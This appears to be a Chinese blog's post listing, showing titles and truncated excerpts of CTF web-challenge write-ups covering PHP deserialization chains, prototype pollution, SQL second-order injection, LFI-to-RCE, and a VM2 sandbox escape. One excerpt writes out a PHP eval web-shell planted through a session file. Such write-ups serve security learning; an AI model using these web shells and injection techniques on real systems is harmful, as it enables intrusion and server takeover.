- 博客(20)
- 收藏
- 关注
RSS订阅原创 [2022DASCTF]ezpop
[2022DASCTF]ezpop <?phpclass crow{ public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); }}class fin{ public
2022-04-22 19:23:41
1556
原创 TQL simple php
TQL simple phpif(isset($_POST['user']) && isset($_POST['pass'])){ $hash_user = md5($_POST['user']); $hash_pass = 'zsf'.md5($_POST['pass']);//对passmd5加密 if(isset($_POST['punctuation'])){ //filter if (strlen($_POST['user'
2022-04-22 19:21:10
399
原创 PHPRCE
PHPRCE<?phperror_reporting(0);class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store
2022-04-22 19:19:59
1013
原创 [HarekazeCTF2019]Avatar Uploader 1
[HarekazeCTF2019]Avatar Uploader 1首先就是一个普通界面常规思路看cookie 路径啥的都没有有用的信息这个界面是可以直接登录的题目中也给出了源码首先 是基本的对图片的识别最后获得flag的位置为size处也就是 getimagesize()函数的识别在检查文件类型时,finfo_file()函数检测上传图片的类型是否是image/png在检查文件长宽时,getimagesize() 函数用于获取图像大小及相关信息,成功将返回个数组也就是说要finfo_
2022-04-22 19:18:11
1248
原创 [GYCTF2020]Ez_Express
[GYCTF2020]Ez_Expressdirsearch 扫到源码 www.zip首先回顾一下原型链污染在我们调用一个对象的某属性时:1.对象(obj)中寻找这一属性2.如果找不到,则在obj.__proto__中寻找属性3.如果仍然找不到,则继续在obj.__proto__.__proto__中寻找这一属性以上机制被称为js的prototype继承链。而原型链污染就与这有关原型链污染定义:如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象
2022-04-22 19:16:48
2262
1
原创 [RoarCTF 2019]Online Proxy
[RoarCTF 2019]Online Proxy<!-- Debug Info: Duration: 0.40283489227295 s Current Ip: 10.244.80.46 -->看到ip联系一下 xff(识别ip的)可以自己修改新知识点一看到current IP和last IP,就应该想到,应该是把我们的IP给写到数据库里了。跟SQL有关挨个测试为单引号闭合执行原理数据在写入数据库时1.127.0.0.1‘or’1在写入时为 Current
2022-04-22 19:14:59
1944
原创 [安洵杯 2019]不是文件上传
[安洵杯 2019]不是文件上传信息泄露github的源码public function view_files($path){ if ($this->ifview == False){ //不用管直接就是FALSE return False; //The function is not yet perfect, it is not open yet. } $content = file_get_contents($path); echo $con
2022-04-22 19:13:31
2471
原创 [ISITDTU 2019]EasyPHP
[ISITDTU 2019]EasyPHP<?phphighlight_file(__FILE__);$_ = @$_GET['_'];if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) die('rosé will not do it');if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd ) die('you are so cl
2022-04-22 19:11:20
1001
原创 bestphp‘s revenge
bestphp’s revenge <?phphighlight_file(__FILE__);$b = 'implode';call_user_func($_GET['f'], $_POST);session_start();if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name'];}var_dump($_SESSION);$a = array(reset($_SESSION), 'welcome_to_th
2022-04-22 19:10:05
381
原创 [SUCTF 2018]GetShell
题目if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal char"); } } } 截取题目有文件包含功能,包含我们上传的文件,那如
2022-04-22 19:08:06
328
原创 LFI_to_RCE
LFI_to_RCE利用session.upload_progress进行文件包含条件竞争首先上传PHP_SESSION_UPLOAD_PROGRESS<?phpsession_start();?>因为session.use_strict_mode默认值为off,所以这时我们可以自定义session id,比如在Cookie里设置PHPSESSID=flag,php就会在服务器上创建一个文件:/tmp/sess_flag,即使此时用户没有初始化se
2022-04-20 16:36:45
429
原创 easyphp
easyphp<?phperror_reporting(0);highlight_file(__FILE__);class XMAN{ public $class; public $para; public $check; public function __construct() { $this->class = "Hel"; $this->para = "xctfer"; echo new
2022-04-20 16:34:00
294
原创 [SCTF2019]Flag Shop
[SCTF2019]Flag Shoprobots.txtrequire 'sinatra'require 'sinatra/cookies'require 'sinatra/json'require 'jwt'require 'securerandom'require 'erb'set :public_folder, File.dirname(__FILE__) + '/static'FLAGPRICE = 1000000000000000000000000000ENV["SE
2022-04-20 16:31:31
484
原创 [红明谷CTF 2021]write_shell
[红明谷CTF 2021]write_shell<?phperror_reporting(0);highlight_file(__FILE__);function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{
2022-04-20 16:29:51
282
原创 [网鼎杯2018]Unfinish
[网鼎杯2018]Unfinish盲猜register界面打开看什么都没有、二次注入类题目绕过方法: mysql中,+只能当做运算符。 执行select ‘1’+'1a’时 结果执行select ‘0’+database();编程了0,但我们可以用ascii编码进行计算。select ‘0’+ascii(substr(database(),1,1));出来了库名第一位的ascii值。回到题目因为过滤了逗号,所以用from for来代替0’+ascii(substr(da
2022-04-20 16:28:06
260
原创 [HFCTF2020]JustEscape 记录
<?phpif( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) { $code = $_GET['code']; echo eval(code);} else { highlight_file(__FILE__);}?> 输入Error().stack猜测是不是js是VM2沙盒逃逸用payload直接打(function (){ TypeError[`
2022-04-20 16:24:37
152
原创 [BJDCTF2020]EzPHP
[BJDCTF2020]EzPHP <?phphighlight_file(__FILE__);error_reporting(0); $file = "1nD3x.php";$shana = $_GET['shana'];$passwd = $_GET['passwd'];$arg = '';$code = '';echo "<br /><font color=red><B>This is a very simple challenge an
2022-04-20 16:22:48
413
原创 [NPUCTF2020]ezinclude
[NPUCTF2020]ezincludeGET /index.php?name=1&pass=fa25e54758d5d5c1927781a6ede89f8aMD5哈希长度拓展攻击把响应包的hash复制到密码那会弹出flag.php这里考察的是PHP临时文件包含,其基本是两种情况:利用能访问的phpinfo页面,对其一次发送大量数据造成临时文件没有及时被删除PHP版本<7.2,利用php崩溃留下临时文件脚本写入import requestsfrom io import
2022-04-20 16:19:36
190
原创 [GYCTF2020]EasyThinking
www.zip下有源码thinkphp漏洞登录时会有session1234567890123456789012345678.php可以修改注意是32位有搜索功能<?php @eval($_POST['123']);?>搜索的结果会存在/runtime/session/下getshell/runtime/session/sess_1234567890123456789012345678.php蚁剑链接根目录下有readflag但是ban了好多之前的题在这个用不了但是.
2022-04-20 16:17:44
684
原创 [MRCTF2020]Ezaudit
[MRCTF2020]Ezauditdirsearch扫目录www.zip有源码 else if($Private_key != '*****' ) { header('refresh:2; url=login.html'); echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!"; exit; }else{ if($Private_key === '************'){ $getuser = "SELECT flag FROM use...
2022-04-20 16:14:21
1291
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人